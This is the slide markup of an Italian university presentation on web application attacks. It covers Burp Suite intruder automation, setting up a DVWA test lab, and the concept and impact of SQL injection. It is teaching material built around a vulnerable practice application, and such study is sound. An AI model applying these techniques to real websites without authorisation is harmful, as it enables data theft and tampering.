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2" roundtripDataSignature="AMtx7mhxP+o5LGbiRsO+r/Ypz2Gqh5vm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it-IT"/>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26" name="Google Shape;32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1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2100"/>
              <a:t>Exploiting dei bug – Attacchi alle ACLs ed information leakage possono essere automatizzati grazie all’intruder;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2300"/>
              <a:t>Crawling – Dato un dizionario di path/file possiamo effettuare un crawling come farebbero software come Dirbuster o Hoppy;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2300"/>
              <a:t>Richieste concorrenziali – È possibile effettuare stress test sul server inviando richieste in parallelo.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Google Shape;33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b4f84573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b4f845734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6b4f845734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b4f84573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b4f84573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6b4f845734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titolo" showMasterSp="0" type="title">
  <p:cSld name="TITLE">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="26" name="Shape 26"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Google Shape;27;p49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="-8467"/>
            <a:ext cx="12192000" cy="6866467"/>
            <a:chOff x="0" y="-8467"/>
            <a:chExt cx="12192000" cy="6866467"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="28" name="Google Shape;28;p4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4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4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1" name="Google Shape;31;p4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49"/>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4" name="Google Shape;34;p4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5" name="Google Shape;35;p4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6" name="Google Shape;36;p4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49"/>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9"/>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sottotitolo">
  <p:cSld name="Titolo e sottotitolo">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="94" name="Shape 94"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p5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5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zione con didascalia">
  <p:cSld name="Citazione con didascalia">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="100" name="Shape 100"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p5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5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5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07" name="Google Shape;107;p5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5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p:cSld name="Scheda nome">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="109" name="Shape 109"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;110;p60"/>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0"/>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6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6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cheda nome citazione">
  <p:cSld name="Scheda nome citazione">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="115" name="Shape 115"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p6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6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6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6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
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p6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6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it-IT"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o o falso">
  <p:cSld name="Vero o falso">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="124" name="Shape 124"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Google Shape;125;p62"/>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6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6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6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6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6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testo verticale" type="vertTx">
  <p:cSld name="VERTICAL_TEXT">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="131" name="Shape 131"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Google Shape;132;p6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63"/>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6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6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olo e testo verticale" type="vertTitleAndTx">
  <p:cSld name="VERTICAL_TITLE_AND_VERTICAL_TEXT">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="137" name="Shape 137"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Google Shape;138;p64"/>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64"/>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6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6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olo e contenuto" type="obj">
  <p:cSld name="OBJECT">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="43" name="Shape 43"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Google Shape;44;p5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magine con didascalia" type="picTx">
  <p:cSld name="PICTURE_WITH_CAPTION_TEXT">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="49" name="Shape 49"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Google Shape;50;p5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1"/>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52" name="Google Shape;52;p5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53" name="Google Shape;53;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estazione sezione" type="secHead">
  <p:cSld name="SECTION_HEADER">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="56" name="Shape 56"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Google Shape;57;p52"/>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2"/>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9" name="Google Shape;59;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ue contenuti" type="twoObj">
  <p:cSld name="TWO_OBJECTS">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="62" name="Shape 62"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Google Shape;63;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3"/>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53"/>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5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fronto" type="twoTxTwoObj">
  <p:cSld name="TWO_OBJECTS_WITH_TEXT">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="69" name="Shape 69"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;70;p5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4"/>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2" name="Google Shape;72;p54"/>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3" name="Google Shape;73;p54"/>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4" name="Google Shape;74;p54"/>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5" name="Google Shape;75;p5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titolo" type="titleOnly">
  <p:cSld name="TITLE_ONLY">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="78" name="Shape 78"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Google Shape;79;p5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uota" type="blank">
  <p:cSld name="BLANK">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="83" name="Shape 83"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Google Shape;84;p5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to con didascalia" type="objTx">
  <p:cSld name="OBJECT_WITH_CAPTION_TEXT">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="87" name="Shape 87"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p5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0" name="Google Shape;90;p5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91" name="Google Shape;91;p5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48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="-8467"/>
            <a:ext cx="12192000" cy="6866467"/>
            <a:chOff x="0" y="-8467"/>
            <a:chExt cx="12192000" cy="6866467"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="Google Shape;11;p4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4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4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4" name="Google Shape;14;p4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48"/>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7" name="Google Shape;17;p4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8" name="Google Shape;18;p4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9" name="Google Shape;19;p4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8"/>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4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fredella@unisannio.it" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:slaudanna@unisannio.it" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jp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addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/" TargetMode="Externa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dvwa.co.uk/DVWA-1.0.7.iso"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
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574473" y="5896358"/>
            <a:ext cx="5181600" cy="753908"/>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SzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Michele Fredella       Sonia Laudanna</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>fredella@unisannio.it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>slaudanna@unisannio.it</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="148" name="Google Shape;148;p1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10695711" y="93705"/>
            <a:ext cx="1496289" cy="1046986"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="logo_header" id="149" name="Google Shape;149;p1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="824372" y="0"/>
            <a:ext cx="8679614" cy="2281382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3254280" y="2401454"/>
            <a:ext cx="8596668" cy="3657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3600"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr b="0" i="0" lang="it-IT" sz="5400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="it-IT" sz="5400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> Sql Injection</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="54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16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="751754" y="1797277"/>
            <a:ext cx="8596312" cy="27792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17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600363" y="471054"/>
            <a:ext cx="8857673"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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Recarsi in: «C:\&lt;Ins_Folder&gt;\Oracle\VirtualBox» , aprire un CMD e digitare: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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>vboxmanage dhcpserver add --netname testlab –ip 10.10.10.1 –netmask 255.255.255.0 –lowerip 10.10.10.2 –upperip 10.10.10.12 --enable</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
              <a:ea typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
              <a:sym typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="212" name="Google Shape;212;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="861724" y="2163949"/>
            <a:ext cx="8596312" cy="26185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18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="696336" y="1346196"/>
            <a:ext cx="8596312" cy="3533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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="529553" y="1532516"/>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it-IT"/>
              <a:t>Uno statement in SQL, forgiato appositamente, viene inserito in un campo dell’applicazione con lo scopo di intraprendere un’azione malevola che impatta il database</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1280"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>L’attacco potrebbe permettere:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1120"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>La manomissione o la distruzione dei dati</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1120"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Il blocco di particolari transazioni</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1120"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Il furto di informazioni sensibili</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1120"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>L’escalation dei privilegi </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-251459" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Google Shape;225;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="806643" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-251459" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="326352" y="377971"/>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it-IT"/>
              <a:t>Quando un’applicazione è vulnerabile a SQL Injection, solitamente, restituisce il messaggio di errore lanciato dal Server SQL all’inserimento dei caratteri speciali:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-251459" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="231" name="Google Shape;231;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="757382" y="1941106"/>
            <a:ext cx="7235591" cy="25095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pic>
        <p:nvPicPr>
          <p:cNvPr id="236" name="Google Shape;236;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6062499" y="319375"/>
            <a:ext cx="2888230" cy="1745131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="237" name="Google Shape;237;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="327411" y="332509"/>
            <a:ext cx="5506280" cy="5127625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
